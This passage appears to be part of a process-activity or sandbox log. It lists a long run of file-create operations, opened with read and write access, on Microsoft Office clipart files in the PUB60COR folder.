3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00167_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00169_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00170_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00171_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00172_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00174_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00175_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00176_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00010_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00015_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00790_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00853_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00914_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00932_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00965_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01039_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01044_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01060_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01084_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01173_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01174_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01184_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01216_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01218_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01251_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01545_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN02122_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN02559_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN02724_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN03500_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04108_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04117_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04134_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04174_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04191_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04195_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04196_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04206_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04225_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04235_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04267_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04269_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04323_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04326_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04332_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04355_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04369_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04384_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04385_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BABY_01.MID | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD00116_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD00141_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD00146_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD00155_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD00160_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD00173_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD05119_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD06102_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD06200_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD07761_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD07804_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD07831_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD08758_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD08773_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD08808_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD08868_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD09031_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD09194_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD09662_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD09664_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD10890_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD10972_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19563_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19582_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19695_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19827_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19828_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19986_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19988_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD20013_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00008_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00012_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00045_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00098_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00105_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00122_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00130_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00148_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00152_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00194_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00195_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00234_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00242_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00247_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00248_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00252_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00254_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00261_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00262_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00265_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00267_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00269_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00270_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00273_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00274_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00296_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00390_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00392_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00524_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00525_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00526_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00648_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00921_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00923_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00932_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00985_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BOAT.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BOATINST.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00076_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00078_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00092_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00100_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00135_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00136_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00145_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00174_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00184_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00186_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00200_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00224_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00438_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00439_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00440_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00441_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00442_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00443_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00444_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00445_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00453_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS01080_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS01603_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS01634_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS01635_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS01636_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS01637_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS01638_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS01639_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
